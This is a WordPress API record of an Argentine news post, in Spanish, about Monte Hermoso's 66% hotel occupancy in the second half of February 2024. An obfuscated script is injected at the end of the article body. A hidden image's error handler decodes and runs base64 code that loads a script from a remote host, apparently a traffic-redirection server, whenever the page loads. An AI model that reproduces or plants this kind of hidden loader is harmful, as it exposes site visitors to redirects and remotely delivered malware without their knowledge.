{"id":7975,"date":"2024-03-01T10:46:14","date_gmt":"2024-03-01T13:46:14","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7975"},"modified":"2025-08-13T15:46:36","modified_gmt":"2025-08-13T18:46:36","slug":"monte-hermoso-registro-una-ocupacion-del-66-en-la-segunda-quincena-de-febrero","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7975","title":{"rendered":"Monte Hermoso registr\u00f3 una ocupaci\u00f3n del 66% en la segunda quincena de febrero"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-0aa0970d8e8682bd5348aee75cc9de23\"><em>El balneario bonaerense \u00abfinaliza el segundo mes del a\u00f1o con una ocupaci\u00f3n hotelera e inmobiliaria 17 puntos por debajo de la alcanzada en febrero del 2023\u00bb, se\u00f1alaron desde el municipio.<\/em><\/h3>\n\n\n\n<p>El balneario bonaerense de\u00a0<strong>Monte Hermoso<\/strong>\u00a0registr\u00f3 una\u00a0<strong>ocupaci\u00f3n promedio del 66% durante la segunda quincena de de febrero<\/strong>, en sus m\u00e1s de 3.500 plazas hoteleras y 15.000 caba\u00f1as, se inform\u00f3 este viernes oficialmente.<\/p>\n\n\n\n<p>\u00abMonte Hermoso despidi\u00f3 febrero con una ocupaci\u00f3n promedio del 66% y finaliza el segundo mes del a\u00f1o con una ocupaci\u00f3n hotelera e inmobiliaria 17 puntos por debajo de la alcanzada en febrero del 2023\u00bb, se\u00f1alaron desde el municipio.<\/p>\n\n\n\n<p>En ese contexto indic\u00f3 que durante el mes de febrero los visitantes fueron oriundos de la provincia de Buenos Aires, Mendoza, Neuqu\u00e9n, Bah\u00eda Blanca, Santa Rosa, C\u00f3rdoba y San Rafael.<\/p>\n\n\n\n<p><strong>\u00abEn enero, en cambio, se alcanz\u00f3 un promedio de ocupaci\u00f3n del 83% con picos del 98% los fines de semana\u00bb<\/strong>, agregaron a T\u00e9lam.<\/p>\n\n\n\n<p>Monte Hermoso tiene playas de 32 kil\u00f3metros de extensi\u00f3n y, por su ubicaci\u00f3n geogr\u00e1fica de este a oeste, es la \u00fanica en el pa\u00eds donde el sol nace y se pone en el mar, caracter\u00edstica que le permite al visitante permanecer durante m\u00e1s tiempo sin conos de sombras proyectados por edificios pr\u00f3ximos a la playa.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"103\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg\" alt=\"\" class=\"wp-image-7468\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-768x77.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-696x70.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-320x32.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-480x48.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-800x80.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg 1067w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El balneario bonaerense \u00abfinaliza el segundo mes del a\u00f1o con una ocupaci\u00f3n hotelera e inmobiliaria 17 puntos por debajo de la alcanzada en febrero del 2023\u00bb, se\u00f1alaron desde el municipio. El balneario bonaerense de\u00a0Monte Hermoso\u00a0registr\u00f3 una\u00a0ocupaci\u00f3n promedio del 66% durante la segunda quincena de de febrero, en sus m\u00e1s de 3.500 plazas hoteleras y 15.000 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7976,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,11,29],"tags":[],"class_list":["post-7975","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-buenos-aires","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7975","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7975"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7975\/revisions"}],"predecessor-version":[{"id":10204,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7975\/revisions\/10204"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7976"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}